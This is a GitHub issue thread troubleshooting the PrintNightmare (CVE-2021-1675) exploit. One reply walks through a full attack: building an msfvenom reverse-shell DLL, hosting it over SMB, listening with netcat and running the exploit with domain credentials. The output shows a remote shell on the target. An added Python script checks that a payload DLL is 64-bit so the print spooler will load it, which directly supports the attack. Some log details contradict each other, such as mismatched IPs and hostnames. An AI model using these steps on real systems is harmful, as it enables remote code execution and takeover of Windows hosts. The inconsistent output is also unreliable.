
Dll not executing #70

Open

useragent23253 opened this issue Jun 8, 2023 · 3 comments

Comments

@useragent23253

I was testing with a custom DLL that creates a local admin user and with msfvenom shellcode. Neither sample is working. Any suggestions?

c:\Users\user1\Downloads>SharpPrintNightmare.exe 'c:\programdata\5001.dll'
[*] pDriverPath C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\mxdwdrv.dll
[*] Executing 'c:\programdata\5001.dll'
[*] Try 1...
[*] Stage 0: 87
[*] Try 2...
[*] Stage 0: 87
[*] Try 3...
[*] Stage 0: 87

@CustosClarus

It will work for you if you use a domain user account, not the admin.

@MiMaz7707

Hello,

The exploit will not work if you use a privileged user; the user must be a simple domain user.

Steps from a Kali machine:

1- remove the preinstalled impacket package

# apt remove --purge python3-impacket
or
# pip3 uninstall impacket

2- install the impacket package from the cube0x0 repo

# git clone https://github.com/cube0x0/impacket
# cd impacket
# python3 ./setup.py install

3- create a DLL payload
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.117.200 LPORT=9090 -f dll -o print64.dll

4- put the payload in a shared folder and run smbserver.py or the smbd service

# cp print64.dll /share/

# smbserver.py share /share -smb2support

/usr/local/bin/smbserver.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'smbserver.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

5- run nc to listen
# nc -lvp 9090
listening on [any] 9090 ...

6- run the exploit as a simple domain user; it will generate some errors but it will work

# python3 CVE-2021-1675.py mylab.local/user:'user@koko123'@192.168.117.10 '\\192.168.117.200\share\print64.dll' 

[*] Connecting to ncacn_np:192.168.117.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3d8f0626c408afea\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.80.41\share\print64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
7- here is my shell :D
nc -lvp 9090
listening on [any] 9090 ...
connect to [192.168.117.200] from SRV-EX01.mylab.local [192.168.117.10] 52823
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
hostname
SRV01

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::4980:feb4:6fae:992d%6
   IPv4 Address. . . . . . . . . . . : 192.168.117.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.117.254

Tunnel adapter isatap.{EC174390-CEE5-4891-85B5-536D188BC65E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>
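
A pre-flight check for the payload DLL, added here as an example; it is not code from the SharpPrintNightmare project or from anyone in this thread. Whichever account runs the exploit, the spooler on the targets shown in both reports is 64-bit (the driver paths are under `Amd64`), so a payload that is not an AMD64 PE32+ DLL cannot be loaded by spoolsv.exe. The script parses only the DOS and COFF headers, reports mismatches in machine type, optional-header magic and the `IMAGE_FILE_DLL` flag, and can be pointed at a real file such as the `print64.dll` built in step 3 (the `windows/x64` msfvenom payload with `-f dll` should pass it). The `build_minimal_pe` images are constructed in the script for offline use and are header-only stubs, not loadable binaries. For reference, the `Stage 0: 87` in the first report is the Win32 error `ERROR_INVALID_PARAMETER`; this check does not claim to explain that failure, it only rules out an architecture or file-type mismatch before you spend time on the account question.

```python
"""Pre-flight checks for a PrintNightmare payload DLL (added example)."""
import struct
import sys
from dataclasses import dataclass

# COFF machine types and characteristics flags (values from the PE/COFF spec).
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_ARM64 = 0xAA64
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
MACHINE_NAMES = {
    IMAGE_FILE_MACHINE_I386: "i386",
    IMAGE_FILE_MACHINE_AMD64: "AMD64",
    IMAGE_FILE_MACHINE_ARM64: "ARM64",
}


@dataclass
class PeInfo:
    machine: int
    characteristics: int
    magic: int  # optional-header magic, 0 if the header is absent


def parse_pe(data: bytes) -> PeInfo:
    """Parse just enough of a PE image to learn its architecture and image type."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = 0
    if opt_size >= 2 and len(data) >= e_lfanew + 26:
        (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)
    return PeInfo(machine, chars, magic)


def check_payload(data: bytes, spooler_64bit: bool = True) -> list[str]:
    """Return the problems that would stop spoolsv.exe loading this image; [] means it looks plausible."""
    try:
        info = parse_pe(data)
    except ValueError as exc:
        return [str(exc)]
    problems = []
    if not info.characteristics & IMAGE_FILE_EXECUTABLE_IMAGE:
        problems.append("IMAGE_FILE_EXECUTABLE_IMAGE not set: not a linked image")
    if not info.characteristics & IMAGE_FILE_DLL:
        problems.append("IMAGE_FILE_DLL not set: this is an EXE, not a DLL")
    want_machine = IMAGE_FILE_MACHINE_AMD64 if spooler_64bit else IMAGE_FILE_MACHINE_I386
    want_magic = PE32PLUS_MAGIC if spooler_64bit else PE32_MAGIC
    if info.machine != want_machine:
        have = MACHINE_NAMES.get(info.machine, hex(info.machine))
        problems.append(f"machine is {have}, spooler needs {MACHINE_NAMES[want_machine]}")
    if info.magic != want_magic:
        want_name = "PE32+" if spooler_64bit else "PE32"
        problems.append(f"optional header magic {info.magic:#x} is not {want_name}")
    return problems


def build_minimal_pe(machine: int, characteristics: int, magic: int) -> bytes:
    """Constructed sample: a header-only image (not loadable) for exercising the checks offline."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 2, characteristics)
    return dos + b"PE\0\0" + coff + struct.pack("<H", magic)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real use: python3 check_payload.py print64.dll
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
        print(sys.argv[1], check_payload(image) or "OK for a 64-bit spooler")
    else:
        samples = {
            "x64 dll": build_minimal_pe(IMAGE_FILE_MACHINE_AMD64,
                                        IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_DLL, PE32PLUS_MAGIC),
            "x86 dll": build_minimal_pe(IMAGE_FILE_MACHINE_I386,
                                        IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_DLL, PE32_MAGIC),
            "x64 exe": build_minimal_pe(IMAGE_FILE_MACHINE_AMD64,
                                        IMAGE_FILE_EXECUTABLE_IMAGE, PE32PLUS_MAGIC),
        }
        for name, image in samples.items():
            print(name, check_payload(image) or "OK for a 64-bit spooler")
```

Run it with no arguments to see the three constructed cases, or pass the path of the DLL you intend to host on the share. Pass `spooler_64bit=False` to `check_payload` only when the target's `pDriverPath` points at an `x86` driver directory rather than `Amd64`.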


@MiMaz7707

It works fine with impacket 0.11.0 too.
